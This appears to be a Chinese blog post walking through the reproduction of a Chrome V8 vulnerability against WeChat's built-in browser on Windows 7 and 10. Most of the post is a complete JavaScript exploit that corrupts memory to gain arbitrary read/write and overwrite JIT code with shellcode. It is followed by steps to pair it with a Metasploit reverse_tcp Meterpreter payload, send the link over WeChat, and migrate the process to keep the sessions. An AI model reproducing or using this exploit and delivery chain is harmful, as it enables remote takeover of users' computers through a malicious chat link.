Black-Horse

chrome 漏洞-WeChat

对于近日chrome 0day 漏洞复现测试。(纯小白观念,不对之处,还请大佬们斧正。)

实验环境:

攻击机:kali

靶机:windows7旗舰版x64,windows10家庭版x64

WeChat:3.2.1.121,3.2.1.132

先在本地搭建服务,使用任何方法都可以,phpstudy,upupw,wampserver,都可以,也可以直接搭建在服务器上。

POC:

  1 ENABLE_LOG = true;
  2 IN_WORKER = true;
  3 
  4 
  5 // run calc and hang in a loop
  6 var shellcode = [];
  7 
  8 
  9 function print(data) {
 10 }
 11 
 12 
 13 
 14 
 15 var not_optimised_out = 0;
 16 var target_function = (function (value) {
 17     if (value == 0xdecaf0) {
 18         not_optimised_out += 1;
 19     }
 20     not_optimised_out += 1;
 21     not_optimised_out |= 0xff;
 22     not_optimised_out *= 12;
 23 });
 24 
 25 
 26 for (var i = 0; i < 0x10000; ++i) {
 27     target_function(i);
 28 }
 29 
 30 
 31 
 32 
 33 var g_array;
 34 var tDerivedNCount = 17 * 87481 - 8;
 35 var tDerivedNDepth = 19 * 19;
 36 
 37 
 38 function cb(flag) {
 39     if (flag == true) {
 40         return;
 41     }
 42     g_array = new Array(0);
 43     g_array[0] = 0x1dbabe * 2;
 44     return 'c01db33f';
 45 }
 46 
 47 
 48 function gc() {
 49     for (var i = 0; i < 0x10000; ++i) {
 50         new String();
 51     }
 52 }
 53 
 54 
 55 function oobAccess() {
 56     var this_ = this;
 57     this.buffer = null;
 58     this.buffer_view = null;
 59 
 60 
 61     this.page_buffer = null;
 62     this.page_view = null;
 63 
 64 
 65     this.prevent_opt = [];
 66 
 67 
 68     var kSlotOffset = 0x1f;
 69     var kBackingStoreOffset = 0xf;
 70 
 71 
 72     class LeakArrayBuffer extends ArrayBuffer {
 73         constructor() {
 74             super(0x1000);
 75             this.slot = this;
 76         }
 77     }
 78 
 79 
 80     this.page_buffer = new LeakArrayBuffer();
 81     this.page_view = new DataView(this.page_buffer);
 82 
 83 
 84     new RegExp({ toString: function () { return 'a' } });
 85     cb(true);
 86 
 87 
 88     class DerivedBase extends RegExp {
 89         constructor() {
 90             // var array = null;
 91             super(
 92                 // at this point, the 4-byte allocation for the JSRegExp `this` object
 93                 // has just happened.
 94                 {
 95                     toString: cb
 96                 }, 'g'
 97                 // now the runtime JSRegExp constructor is called, corrupting the
 98                 // JSArray.
 99             );
100 
101 
102             // this allocation will now directly follow the FixedArray allocation
103             // made for `this.data`, which is where `array.elements` points to.
104             this_.buffer = new ArrayBuffer(0x80);
105             g_array[8] = this_.page_buffer;
106         }
107     }
108 
109 
110     // try{
111     var derived_n = eval(`(function derived_n(i) {
112         if (i == 0) {
113             return DerivedBase;
114         }
115 
116 
117         class DerivedN extends derived_n(i-1) {
118             constructor() {
119                 super();
120                 return;
121                 ${"this.a=0;".repeat(tDerivedNCount)}
122             }
123         }
124 
125 
126         return DerivedN;
127     })`);
128 
129 
130     gc();
131 
132 
133 
134 
135     new (derived_n(tDerivedNDepth))();
136 
137 
138     this.buffer_view = new DataView(this.buffer);
139     this.leakPtr = function (obj) {
140         this.page_buffer.slot = obj;
141         return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);
142     }
143 
144 
145     this.setPtr = function (addr) {
146         this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);
147     }
148 
149 
150     this.read32 = function (addr) {
151         this.setPtr(addr);
152         return this.page_view.getUint32(0, true, ...this.prevent_opt);
153     }
154 
155 
156     this.write32 = function (addr, value) {
157         this.setPtr(addr);
158         this.page_view.setUint32(0, value, true, ...this.prevent_opt);
159     }
160 
161 
162     this.write8 = function (addr, value) {
163         this.setPtr(addr);
164         this.page_view.setUint8(0, value, ...this.prevent_opt);
165     }
166 
167 
168     this.setBytes = function (addr, content) {
169         for (var i = 0; i < content.length; i++) {
170             this.write8(addr + i, content[i]);
171         }
172     }
173     return this;
174 }
175 
176 
177 function trigger() {
178     var oob = oobAccess();
179 
180 
181     var func_ptr = oob.leakPtr(target_function);
182     print('[*] target_function at 0x' + func_ptr.toString(16));
183 
184 
185     var kCodeInsOffset = 0x1b;
186 
187 
188     var code_addr = oob.read32(func_ptr + kCodeInsOffset);
189     print('[*] code_addr at 0x' + code_addr.toString(16));
190 
191 
192     oob.setBytes(code_addr, shellcode);
193 
194 
195     target_function(0);
196 }
197 
198 
199 try{
200     print("start running");
201     trigger();
202 }catch(e){
203     print(e);
204 }

shellcode处填入自己的shellcode 即可。具体可以看chrome的漏洞(传送门

MSF配置:

payload 使用 windows/meterpreter/reverse_tcp

WeChat发送链接。

点开链接直接访问。

 

WeChat上线和chrome一样,如果用户关闭WeChat浏览器的话就会断开连接,所以设置的和chrome的一样,要迁移进程。

已经有两个上线了。

 

 

 

-------------------------------------------------------------------------------------------------------------------------------------

 以上均为自己测试,均是个人的观点和方法,不对之处,还望大佬们指出,会及时修改,以免误人子弟。

posted @ 2021-04-19 11:01  Black--Horse  阅读(228)  评论(0编辑  收藏  举报